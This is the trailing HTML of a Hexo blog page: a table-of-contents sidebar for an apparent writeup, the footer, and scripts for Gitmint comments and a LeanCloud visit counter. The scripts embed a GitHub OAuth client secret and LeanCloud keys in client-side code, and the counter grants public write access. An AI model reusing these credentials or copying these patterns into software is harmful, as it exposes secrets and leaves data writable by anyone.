              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#思考过程"><span class="nav-number">2.</span> <span class="nav-text">思考过程</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#writeup"><span class="nav-number">3.</span> <span class="nav-text">writeup</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#更多思考"><span class="nav-number">4.</span> <span class="nav-text">更多思考</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#后话"><span class="nav-number">5.</span> <span class="nav-text">后话</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#参考文献"><span class="nav-number">6.</span> <span class="nav-text">参考文献</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">eviloH</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  







<!-- LOCAL: You can save these files to your site and update links -->
    
        
        <link rel="stylesheet" href="https://aimingoo.github.io/gitmint/style/default.css">
        <script src="https://aimingoo.github.io/gitmint/dist/gitmint.browser.js"></script>
    
<!-- END LOCAL -->

    

    
      <script type="text/javascript">
      function renderGitment(){
        var gitment = new Gitmint({
            id: '1535976755000', 
            owner: 'eviloH',
            repo: 'eviloH.github.io',
            
            lang: "" || navigator.language || navigator.systemLanguage || navigator.userLanguage,
            
            oauth: {
            
            
                client_secret: '534cb13bbf0ae4c3f2e7426b2988fddb17d0936a',
            
                client_id: 'e8e81f52a3b78b4ff0e4'
            }});
        gitment.render('gitment-container');
      }

      
      renderGitment();
      
      </script>
    







  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("ygFLJkCejHN4FBRm1MNotECL-gzGzoHsz", "D41dFC6ScJB4YxsA8qiAESs1");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
